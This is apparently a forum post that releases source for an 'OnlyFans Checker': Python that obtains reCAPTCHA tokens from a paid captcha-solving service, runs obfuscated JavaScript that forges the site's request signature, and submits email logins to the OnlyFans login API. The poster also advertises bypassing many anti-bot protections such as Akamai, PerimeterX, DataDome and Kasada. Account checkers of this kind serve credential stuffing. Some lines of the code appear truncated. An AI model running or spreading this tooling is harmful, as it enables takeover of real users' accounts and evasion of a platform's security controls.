OP 12 July, 2024 - 09:03 AM
Onlyfans Checker is now open source, please pick it up by yourself, recaptcha and sign have been solved,
The two main difficulties have been solved for you. You can run it after copying it.
sign is very simple, but there are still people who dare to sell it for money. I was so angry that I open sourced it.
The two main difficulties have been solved for you. You can run it after copying it.
sign is very simple, but there are still people who dare to sell it for money. I was so angry that I open sourced it.
from enum import verify
from math import fabs
import execjs
import requests
import json
import re
import base64
import time
import hashlib
# 定义 JavaScript 代码
js_code = '''
function t(W, n) {
return o(n - 967, W)
function o(W, n) {
return k(W - -779, n)
function C() {
var W = ["W4NcKKVdTW", "W4nWWQJcNMu", "W5xdUCoOsmkpW6C", "iNddQ8ochYNcQJ3dR8k0", "i0fAoSos", "WRzko00D", "vttcPs85W4NcGuW", "WRv0WRVdLSoDhSot", "WP/dP8oSuCohbCkCrCkpWQC", "lxOTpwTCeG", "WPipW5xdQmkLcG", "CSkYCCkLBCo8", "yLJdJSkWWOpdJWJcQ8kQimoEEmk+W47cRrxcU2jEomofk39EW7DiWQhcGSkUWOaZWPa", "ghmGFCou", "v8kBgIzp", "hgOWW4JdTq", "WO0yWQzzWOXQjuHhWR3dV1CJ", "W6dcH8kFlmoX", "lmoCnNldJq", "WRddVCoeCCkiWO0jWQpdGbPLya", "uSkMhdD8WRvEFrJcVG", "W5JcTwaMW6O", "W4rIlCobWPe", "W4PEWO/cT8oIuCkbs1hcINelW5O", "ixCSx8o0", "DGmrorBdVaLKb0C", "WOSTW7NdGIi", "eeNdHsmP", "lx3dPmoxkc4", "hSk9x8oMkW", "B8kwACkbpa", "W5rbfmozWQfvWOJcLGCN", "W4jBgq", "W6f7WRpdGZfqWRtdSmokmG", "WRT4bL0K", "zr0pECkpWPvGW4KorNRdJG", "AtTZpqK", "DSkfuSkBwW", "AmotWQv+lG", "h2a8W5pdKa", "ySkNW7hcTSklW5xcTCocmCkbWR1Bjq", "teqTehO", "tSk7WPSrFCoZ", "ix8OW7JdIq", "FCk8WPuYW4u", "p8ozWOldImo2", "W4PNW4OlW4W", "oCoIW5/cMCoa", "W4HgW5C7W5i", "W5/dMmoivSkq", "Df3cLSo3WOxcLIxcMCkOba", "mSkOW7qWW5y", "W7VdTCkjW5dcHH5BWP8yWQdcP8kwvq", "WQ3dKZtdUmo4", "fCo0ugRdQdK", "W5PeW7mtW7W2D0TnWQ0", "WPVdKIzFBa", "DmoWkMpdG8ouW43cUdFcUchcKtO", "WQjHmwyMWOD9W5e1W5G", "WRNdKZrbwKamWOFdGGa", "WOtcNSkQCCkmFq", "WPtdNCoaESog", "WQFdSXBdImoh", "dMCyu8oHma", "FCk/FSkWwSo7WPH/brC", "FY9leZXd", "DCkUW5m2BCoqD8oJcCknd8ksA8og", "WOZdSSoTW5qM", "l8oFjguM", "WRrEa0Cr", "iNGqhGzOeCkKCG", "WQVcNCknuCk7", "meldMSoslq", "W7dcTmkAhSk4", "WOVdJmoMESo8", "WOKLW6VdRCkc", "WO/dHmovsCo3", "ev3dVCoNma", "W7CmWQnzW5m", "W69lWPVdPZ8", "ANSYiuLXjSoO", "WQ1SpNmrWOa", "WPNdNmkLW4S7dtldQZOC", "W454WRXRWPOn", "WP3dMSoiW70", "WQhcMmkYxmkU", "CCo4WQDToG", "DLFcHa", "WPKpW4/dU8k0emoea3VcM1CTWQbOW57dNSoDoI3dQColvSkM", "WRRdM3K2pCkjWPOmo8kj", "i1GmW47dIG", "W74LWQJcJG", "agRdVdSzWPpcGe/dOCos", "W5JcGSktWQ1KWOb/zHldStFdLq", "W41yi8oIWQm", "W6mRWPjjW4nAA8oMaIy", "W69DWOddMrW", "iSkTtYFcSa", "W4RcJSkVgCkFW7CUWPSrCW", "jSkMDdG", "WPDTi2qp", "oCkWDmoJea", "i0euW7VdRq", "WOJdLsZdLCoAW5O", "DCkHWOO7W6Se", "dmoHW4hcSCod", "W6KKWQtcMCowW7f7WQxcNXS", "WPenW67dVSkL", "mmofWQFdPSoi", "W652WRZdLGzx", "W63cMCkXhCo+", "jeCoj8oW", "ddFdJ8kxW5FcUNDUW6/dRG", "W6yPWQVcJmoHW7y", "amo8thqiW6GiEW7cJ3FcKNa", "ACoOW5ewW7ZdVSkOsW", "W5lcO2JdO1e", "W6NcRSksi8oiW5W", "W4K6WORcK8oL", "W5hcISksWQ1MWOSlzttdNXFdO8oH", "nmk5W54HW4VdHG", "iSoShLBdGXZdQ2NdPmk4", "W6CcWPFcG8o7", "W5RdTmoNxCk4W6dcLSkpW4Lg", "amo0WRpdTCos", "imkSCZhcG8kf", "W7f3WPtdImoM", "W6b+W4yuW5S", "W5ZcSCkDomkO", "mSoAoM8q", "W5KPWQlcHSog", "A8oVWR5zja", "jGFdGSoVWOJcUHlcMSk+", "k8oOb1SqaG", "jf8rgXBdGZ1V", "Cmk2ACkRFSo1WOH1nK1ZWRRdJ8kKiY7dLIrJ", "W6L1t8kHW4hdRce3zmo3", "WP0cW5RdVCksdCotsfVcMG", "Emo+lgxdHmoFW47cHdZcHG/cRsK", "W4LRyCkRW7i", "pmo/WQNdQW", "kuC8W5pdOmkDp8o3qCkf", "W5fwWOPMWP0", "WPpdVXldKmo9", "W5b/WRVdOcS", "ASosWPLOhCkt", "W6WMWP1CW7rD", "l0qWm8o4", "i8ohWPpdLSom", "B3mqj0i", "pSkGzmo/cCohW4NdLxZcJq", "CcjebGTejSkNzmkO", "WRCjW43dHCkh", "jmoLce4NbCkHWRVcTM8", "jGtdHSk9W7ldGhJdJmkAa8o1w8k0W5m", "kmo6WOXPlCkb", "jgzijSoZ", "ECo/jwpdG8ouWOBcMcRcOt3cQG"];
return (C = function() {
return W
function k(W, n) {
const o = C();
return k = function(n, t) {
let c = o[n -= 289];
if (void 0 === k.KKHIlG) {
var r = function(W) {
const n = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=";
let o = ""
, t = "";
for (let c = 0, r, u, i = 0; u = W.charAt(i++); ~u && (r = c % 4 ? 64 * r + u : u,
c++ % 4) ? o += String.fromCharCode(255 & r >> (-2 * c & 6)) : 0)
u = n.indexOf(u);
for (let c = 0, r = o.length; c < r; c++)
t += "%" + ("00" + o.charCodeAt(c).toString(16)).slice(-2);
return decodeURIComponent(t)
const n = function(W, n) {
let o = [], t = 0, c, u = "", i;
for (W = r(W),
i = 0; i < 256; i++)
o[i] = i;
for (i = 0; i < 256; i++)
t = (t + o[i] + n.charCodeAt(i % n.length)) % 256,
c = o[i],
o[i] = o[t],
o[t] = c;
i = 0,
t = 0;
for (let r = 0; r < W.length; r++)
i = (i + 1) % 256,
t = (t + o[i]) % 256,
c = o[i],
o[i] = o[t],
o[t] = c,
u += String.fromCharCode(W.charCodeAt(r) ^ o[(o[i] + o[t]) % 256]);
return u
k.womakW = n,
W = arguments,
k.KKHIlG = !0
const u = undefined
, i = n + o[0]
, e = W[i];
return e ? c = e : (void 0 === k.cdnRwA && (k.cdnRwA = !0),
c = k.womakW(c, t),
W[i] = c),
k(W, n)
function o(W, n) {
return k(W - -779, n)
!function(W, n) {
function o(W, n) {
return k(n - -725, W)
const t = W();
for (; ; )
try {
const W = undefined;
if (parseInt(o("nt8!", -424)) / 1 + -parseInt(o("s(pC", -329)) / 2 + -parseInt(o("DNZ*", -436)) / 3 * (parseInt(o("cAmi", -420)) / 4) + -parseInt(o("czii", -311)) / 5 * (-parseInt(o("^rJh", -350)) / 6) + parseInt(o("cKvk", -328)) / 7 * (parseInt(o("Yx5h", -305)) / 8) + -parseInt(o("Yx5h", -386)) / 9 + parseInt(o("O58S", -377)) / 10 === n)
} catch (c) {
}(C, 635831);
function getsalt(){
return o(-485, "czii");
function getsign(sha1_str){
var n = {
mNRhn: function(W, n) {
return W + n
Aislu: function(W, n) {
return W + n
SegmS: function(W, n) {
return W + n
IcvJV: function(W, n) {
return W + n
cgmXi: function(W, n) {
return W + n
Vdspj: function(W, n) {
return W + n
dxqnZ: function(W, n) {
return W + n
jtDvi: function(W, n) {
return W + n
RPLEA: function(W, n) {
return W + n
eAHLt: function(W, n) {
return W + n
sKXjs: function(W, n) {
return W + n
ndRqG: function(W, n) {
return W + n
CuZka: function(W, n) {
return W + n
zkbdu: function(W, n) {
return W + n
wCkYx: function(W, n) {
return W + n
qjEZm: function(W, n) {
return W + n
PEwWl: function(W, n) {
return W + n
pJqjJ: function(W, n) {
return W + n
zqVIA: function(W, n) {
return W - n
mXIVM: function(W, n) {
return W % n
wmcvk: function(W, n) {
return W - n
wOPbS: function(W, n) {
return W % n
iwQoi: function(W, n) {
return W - n
uWSSt: function(W, n) {
return W % n
RliQY: function(W, n) {
return W % n
hRMYB: function(W, n) {
return W - n
eLchM: function(W, n) {
return W + n
UOars: function(W, n) {
return W % n
qgqry: function(W, n) {
return W % n
CvOxp: function(W, n) {
return W % n
fUgcp: function(W, n) {
return W - n
fDNyk: function(W, n) {
return W % n
CCTzi: function(W, n) {
return W + n
CFawj: function(W, n) {
return W % n
YRTud: function(W, n) {
return W % n
VEmiV: function(W, n) {
return W % n
inIZN: function(W, n) {
return W - n
kPuYj: function(W, n) {
return W + n
qZPbq: function(W, n) {
return W % n
CfIGC: function(W, n) {
return W + n
YoWEQ: function(W, n) {
return W % n
ogUqt: function(W, n, o, t) {
return W(n, o, t)
iIBMN: function(W, n) {
return W(n)
hXDzL: o(-485, "czii")
var W=sha1_str;
return Math[t("czii", 557)](n[t("VpBY", 592)](n[t("DIi@", 526)](n[t("*jqi", 566)](n[t("VpBY", 600)](n[t("#UOP", 523)](n[t("sCaF", 575)](n[t("sCaF", 517)](n[t("SFeJ", 570)](n[t("cAmi", 622)](n[t("!E8O", 571)](n[t("cKvk", 521)](n[t("P@*V", 511)](n[t("^rJh", 537)](n[t("IuYQ", 546)](n[t("Yx5h", 567)](n[t("!E8O", 499)](n[t("N3hK", 496)](n[t("IuYQ", 544)](n[t("ig9^", 518)](n[t("fd3p", 494)](n[t("SFeJ", 633)](n[t("ig9^", 516)](n[t("eN)i", 547)](n[t("QgU3", 492)](n[t("*&XS", 626)](n[t("J0gn", 506)](W[n[t("*jqi", 549)](27088, W[t("]ebt", 574)])][t("eN)i", 631)](0), 81) + n[t("DNZ*", 596)](W[n[t("5zQm", 556)](28617, W[t("HTlt", 603)])][t("G%t@", 559)](0), 78), n[t("6Fq4", 560)](W[26754 % W[t("O58S", 625)]][t("nBmi", 606)](0), 89)), W[n[t("sK$m", 618)](27770, W[t("593D", 524)])][t("5)#2", 582)](0) + 148), W[n[t("(BeO", 581)](28727, W[t("Yx5h", 595)])][t("!E8O", 620)](0) - 80), n[t("IuYQ", 531)](W[27223 % W[t("cAmi", 480)]][t("8WJs", 568)](0), 110)), n[t("yhax", 497)](W[n[t("cAmi", 545)](27455, W[t("V)VA", 530)])][t("yhax", 562)](0), 153)), n[t("nt8!", 487)](W[n[t("NH9I", 548)](26593, W[t("fd3p", 533)])][t("yhax", 562)](0), 75)), n[t("fd3p", 483)](W[n[t("SFeJ", 539)](27528, W[t("HTlt", 603)])][t("[P$B", 552)](0), 81)) + n[t("5zQm", 508)](W[n[t("6Fq4", 509)](27023, W[t("hTg(", 630)])][t("nBmi", 606)](0), 67), n[t("wxyO", 612)](W[27648 % W[t("nt8!", 587)]][t("s(pC", 490)](0), 120)), n[t("SFeJ", 504)](W[n[t("P@*V", 619)](26971, W[t("eN)i", 498)])][t("[P$B", 552)](0), 94)), W[n[t("*jqi", 614)](26433, W[t("5zQm", 615)])][t("8WJs", 568)](0) - 52), n[t("nt8!", 580)](W[n[t("VpBY", 588)](28005, W[t("ths]", 481)])][t("NH9I", 565)](0), 110)), W[n[t("qbCE", 488)](27333, W[t("Yx5h", 595)])][t("czii", 520)](0) + 115), n[t("sK$m", 578)](W[n[t("XR!t", 500)](28953, W[t("O58S", 625)])][t("6Fq4", 611)](0), 142)), n[t("#UOP", 532)](W[27136 % W[t("593D", 524)]][t("SFeJ", 528)](0), 48)), n[t("ths]", 507)](W[n[t("m8$W", 491)](28494, W[t("#UOP", 573)])][t("0X%N", 495)](0), 87)), W[n[t("hTg(", 519)](28548, W[t("O58S", 625)])][t("*jqi", 503)](0) + 58) + n[t("*&XS", 632)](W[n[t("#UOP", 613)](28836, W[t("wxyO", 553)])][t("IuYQ", 478)](0), 113), n[t("HTlt", 538)](W[n[t("ig9^", 597)](27900, W[t("5zQm", 615)])][t("DIi@", 529)](0), 105)), W[n[t("6Fq4", 485)](28267, W[t("NH9I", 616)])][t("ig9^", 525)](0) + 91) + n[t("QgU3", 564)](W[n[t("8WJs", 598)](27823, W[t("ths]", 481)])][t("VpBY", 576)](0), 68), n[t("sK$m", 594)](W[n[t("HTlt", 599)](28187, W[t("J0gn", 535)])][t("cAmi", 607)](0), 129)), n[t("V)VA", 555)](W[n[t("8WJs", 543)](28085, W[t("HTlt", 603)])][t("J0gn", 621)](0), 101)), n[t("6Fq4", 572)](W[28334 % W[t("hTg(", 630)]][t("0X%N", 495)](0), 81)) + (W[28421 % W[t("eN)i", 498)]][t("HTlt", 623)](0) - 92), n[t("6Fq4", 513)](W[n[t("eN)i", 542)](26519, W[t("VpBY", 583)])][t("qbCE", 591)](0), 109)), n[t("V)VA", 541)](W[n[t("nBmi", 609)](26820, W[t("Eh5F", 512)])][t("!E8O", 620)](0), 70)) + n[t("]ebt", 514)](W[n[t("5zQm", 601)](26667, W[t("SFeJ", 551)])][t("hTg(", 593)](0), 85), n[t("s(pC", 484)](W[28670 % W[t("cKvk", 590)]][t("QgU3", 501)](0), 83)), W[n[t("(BeO", 617)](26904, W[t("*jqi", 579)])][t("ths]", 534)](0) + 108))[t("P@*V", 550)](16)
# Configuration
CAPTCHA_ENDPOINT = "http://api.clearcaptcha.com/captcha/recaptcha_enterprise_v2v3"
USER_AGENT = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/"
email="[email protected]"
headers = {
'Accept': 'application/json, text/plain, */*',
'Accept-Encoding': 'gzip, deflate, br, zstd',
'Accept-Language': 'zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7',
'Sec-Ch-Ua': '"Not/A)Brand";v="8", "Chromium";v="126", "Google Chrome";v="126"',
'Sec-Ch-Ua-Mobile': '?0',
'Sec-Ch-Ua-Model': '""',
'Sec-Ch-Ua-Platform': '"Windows"',
'Sec-Fetch-Dest': 'empty',
'Sec-Fetch-Mode': 'cors',
'Sec-Fetch-Site': 'same-origin',
'User-Agent': USER_AGENT,
session = requests.Session()
response = requests.get("https://onlyfans.com/",verify=False)
post_data = {
"sitekey": "6LcvNcwdAAAAAMWAuNRXH74u3QePsEzTm6GEjx0J",
response = requests.post(CAPTCHA_ENDPOINT, data=post_data,verify=False)
response_data = response.json()
recaptcha_token_invisible=response_data.get("data", {}).get("recaptcha_token", "")
print(f'reCaptcha Token: {recaptcha_token_invisible}')
post_data = {
"email": email,
# "ec-recaptcha-response":recaptcha_token_normal
ctx = execjs.compile(js_code)
print(f'Sign Salt: {sign_salt}')
unix_time= str(int(time.time() * 1000))
sha1_hash = hashlib.sha1()
sign_str = sha1_hash.hexdigest()
checksum = ctx.call('getsign',sign_str)
print(f'Sign: {sign_str}')
response = requests.post("https://onlyfans.com/api2/v2/users/login", headers=headers, data=post_data,verify=False)
print(f'Login response: {response.text}')
if responsejson["error"]["code"] == 102 :
post_data = {
"sitekey": "6LddGoYgAAAAAHD275rVBjuOYXiofr1u4pFS5lHn",
response = requests.post(CAPTCHA_ENDPOINT, data=post_data,verify=False)
response_data = response.json()
recaptcha_token_normal=response_data.get("data", {}).get("recaptcha_token", "")
print(f'reCaptcha Token: {recaptcha_token_normal}')
post_data = {
"email": email,
response = requests.post("https://onlyfans.com/api2/v2/users/login", headers=headers, data=post_data,verify=False)
print(f'Login response: {response.text}')
There is nothing special about this website, just any captcha and shield can be solved and bypassed
bypass recaptcha, bypass hcaptcha, bypass akamai, bypass Perimeterx _px2, bypass Perimeterx _px3, bypass Incapsula, bypass reese84, bypass __utmvc,
bypass TLS, bypass shape, bypass datadome, bypass kasada, bypass aws-waf-token, bypass akamai bmp
There is nothing special about this website, just any captcha and shield can be solved and bypassed
bypass recaptcha, bypass hcaptcha, bypass akamai, bypass Perimeterx _px2, bypass Perimeterx _px3, bypass Incapsula, bypass reese84, bypass __utmvc,
bypass TLS, bypass shape, bypass datadome, bypass kasada, bypass aws-waf-token, bypass akamai bmp